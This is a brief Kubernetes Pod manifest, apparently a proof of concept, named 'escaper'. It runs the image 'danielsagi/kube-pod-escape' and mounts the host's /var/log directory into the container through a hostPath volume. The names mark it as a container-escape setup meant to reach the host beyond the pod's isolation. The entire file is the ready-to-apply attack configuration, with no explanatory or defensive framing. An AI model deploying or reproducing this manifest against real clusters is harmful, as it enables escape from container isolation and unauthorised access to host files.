apiVersion: v1
kind: Pod
metadata:
  name: escaper
spec:
  containers:
  - name: escaper
    image: danielsagi/kube-pod-escape
    volumeMounts:
    - name: logs
      mountPath: /var/log/host
      readOnly: true
  volumes:
  - name: logs
    hostPath:
      path: /var/log/
      type: Directory
